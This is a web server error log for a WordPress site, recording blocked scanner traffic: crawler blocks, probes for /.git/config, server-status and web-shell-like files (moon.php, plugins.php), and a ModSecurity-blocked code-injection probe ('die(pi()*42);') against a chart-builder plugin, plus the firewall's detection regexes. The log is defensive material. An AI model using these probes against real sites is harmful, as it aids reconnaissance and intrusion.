"27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZxKa_x6Rn5EcNCxTojCoYAAAANQ"] [Fri Oct 18 12:29:35.848202 2024] [:error] [pid 17426:tid 139948928636672] [client 84.239.41.138:45450] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZxKa_ympN_JvjvsdPpbs-AAAAEA"] [Fri Oct 18 12:29:50.077093 2024] [:error] [pid 17986:tid 139948682307328] [client 84.239.41.138:45458] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZxKbDh6Rn5EcNCxTojCoYgAAANU"] [Fri Oct 18 12:29:50.170983 2024] [:error] [pid 17427:tid 139948732663552] [client 84.239.41.138:45460] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZxKbDuUTM_ThpjVnMu7vtwAAAI8"] [Fri Oct 18 12:29:58.041367 2024] [:error] [pid 17425:tid 139948774627072] [client 84.239.41.138:45472] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZxKbFob1zL2d3b4Hj-FmqwAAAAo"] [Fri Oct 18 12:29:58.226142 2024] [:error] [pid 17426:tid 139948682307328] [client 84.239.41.138:45474] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZxKbFimpN_JvjvsdPpbs-QAAAFU"] [Fri Oct 18 12:29:58.666448 2024] [:error] [pid 17426:tid 139948665521920] [client 84.239.41.138:45476] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZxKbFimpN_JvjvsdPpbs-gAAAFc"] [Fri Oct 18 12:29:59.694536 2024] [:error] [pid 17427:tid 139948928636672] [client 84.239.41.138:45480] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZxKbF-UTM_ThpjVnMu7vuQAAAIA"] [Fri Oct 18 12:29:59.988994 2024] [:error] [pid 17426:tid 139948783019776] [client 84.239.41.138:45482] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZxKbFympN_JvjvsdPpbs-wAAAEk"] [Fri Oct 18 12:30:01.057040 2024] [:error] [pid 17426:tid 139948766234368] [client 84.239.41.138:45484] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZxKbGSmpN_JvjvsdPpbs_AAAAEs"] [Fri Oct 18 12:30:04.754876 2024] [:error] [pid 17986:tid 139948707485440] [client 84.239.41.138:45492] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZxKbHB6Rn5EcNCxTojCoZgAAANI"] [Fri Oct 18 12:30:04.853357 2024] [:error] [pid 17986:tid 139948715878144] [client 84.239.41.138:45494] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZxKbHB6Rn5EcNCxTojCoZwAAANE"] [Fri Oct 18 12:30:12.226180 2024] [:error] [pid 17986:tid 139948920243968] [client 84.239.41.138:45512] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZxKbJB6Rn5EcNCxTojCobAAAAME"] [Fri Oct 18 12:30:12.283758 2024] [:error] [pid 17427:tid 139948783019776] [client 84.239.41.138:45514] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZxKbJOUTM_ThpjVnMu7vvAAAAIk"] [Fri Oct 18 15:11:35.065170 2024] [autoindex:error] [pid 17986:tid 139948724270848] [client 4.213.178.211:58694] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Oct 18 17:40:40.016800 2024] [autoindex:error] [pid 595:tid 139948766234368] [client 20.198.56.255:45280] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Oct 18 19:41:26.679328 2024] [authz_core:error] [pid 19649:tid 139948816590592] [client 164.90.208.56:50994] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/18 19:41:31 [error] 19351#19351: *506610 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/10/18 22:02:53 [error] 19351#19351: *517056 access forbidden by rule, client: 103.102.230.7, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/18 22:53:41 [error] 19351#19351: *520875 access forbidden by rule, client: 103.102.230.7, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/18 23:15:29 [error] 19352#19352: *522487 access forbidden by rule, client: 103.102.230.7, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/10/18 23:30:05 [error] 19352#19352: *523660 access forbidden by rule, client: 103.102.230.7, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Oct 18 23:38:25.608819 2024] [autoindex:error] [pid 19323:tid 139948749448960] [client 87.120.113.59:46396] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 23:38:48.108757 2024] [autoindex:error] [pid 19238:tid 139948911851264] [client 87.120.113.59:46404] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 23:39:25.175696 2024] [autoindex:error] [pid 19649:tid 139948757841664] [client 87.120.113.59:46420] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 23:39:32.655020 2024] [autoindex:error] [pid 19236:tid 139948690700032] [client 87.120.113.59:46424] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 23:40:28.740877 2024] [autoindex:error] [pid 19649:tid 139948928636672] [client 87.120.113.59:46446] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 23:41:11.133688 2024] [autoindex:error] [pid 19238:tid 139948928636672] [client 87.120.113.59:46468] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 23:41:32.416390 2024] [:error] [pid 19323:tid 139948707485440] [client 87.120.113.59:46488] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Fri Oct 18 23:41:48.255001 2024] [autoindex:error] [pid 19237:tid 139948766234368] [client 87.120.113.59:46494] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/10/19 00:55:12 [error] 19352#19352: *529559 access forbidden by rule, client: 103.102.230.7, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Oct 19 05:03:46.334954 2024] [:error] [pid 19388:tid 139957146482432] [client 89.248.169.52:47676] [client 89.248.169.52] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-automatic/inc/csv.php"] [unique_id "ZxOEAmZniyd7ETNtjmQa-QAAAMI"] [Sat Oct 19 16:45:25.672801 2024] [:error] [pid 31699:tid 139957003806464] [client 45.227.254.34:40536] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/chart-builder/pb_templates/chart-builder.php"] [unique_id "ZxQodW7m-6oU7tBwWgqKNQAAAdM"] [Sat Oct 19 20:06:05.246551 2024] [autoindex:error] [pid 23550:tid 139957054162688] [client 20.198.56.255:44062] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/10/20 08:21:38 [error] 1285#1285: *571705 access forbidden by rule, client: 195.178.110.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Oct 20 10:21:55.492237 2024] [authz_core:error] [pid 1328:tid 140519208363776] [client 157.245.36.108:57126] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/20 10:21:59 [error] 1286#1286: *574116 access forbidden by rule, client: 157.245.36.108, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/10/20 11:10:57 [error] 1285#1285: *574723 access forbidden by rule, client: 195.178.110.32, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/20 12:20:07 [error] 1285#1285: *576164 access forbidden by rule, client: 195.178.110.32, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sun Oct 20 17:39:36.916538 2024] [authz_core:error] [pid 2083:tid 140519250327296] [client 143.110.213.72:36158] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/20 17:39:40 [error] 1286#1286: *579225 access forbidden by rule, client: 143.110.213.72, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/10/21 15:50:01 [error] 26922#26922: *586364 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/10/21 16:33:04 [error] 26923#26923: *586637 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/21 16:54:30 [error] 26923#26923: *586931 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/10/21 19:17:49 [error] 26922#26922: *588817 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Mon Oct 21 21:43:07.979739 2024] [autoindex:error] [pid 27536:tid 139910002489088] [client 4.247.174.32:57420] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Oct 22 14:38:32.177705 2024] [authz_core:error] [pid 3755:tid 140445875160832] [client 159.65.18.197:51572] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/22 14:38:37 [error] 29246#29246: *605183 access forbidden by rule, client: 159.65.18.197, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Oct 22 17:34:49.514950 2024] [authz_core:error] [pid 3959:tid 140445791233792] [client 164.92.244.132:55114] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/22 17:34:54 [error] 29245#29245: *607194 access forbidden by rule, client: 164.92.244.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Oct 22 18:41:30.936477 2024] [autoindex:error] [pid 3866:tid 140445988943616] [client 193.37.32.221:56294] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Tue Oct 22 18:41:35.336039 2024] [autoindex:error] [pid 29282:tid 140445774448384] [client 193.37.32.221:56310] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Tue Oct 22 18:41:45.086707 2024] [autoindex:error] [pid 3755:tid 140445849982720] [client 193.37.32.221:56326] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Tue Oct 22 18:41:46.471834 2024] [autoindex:error] [pid 3963:tid 140445749270272] [client 193.37.32.221:56330] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Tue Oct 22 18:41:47.202927 2024] [:error] [pid 3959:tid 140445757662976] [client 193.37.32.221:56332] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Tue Oct 22 18:41:55.329334 2024] [autoindex:error] [pid 3866:tid 140445782841088] [client 193.37.32.221:56350] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex 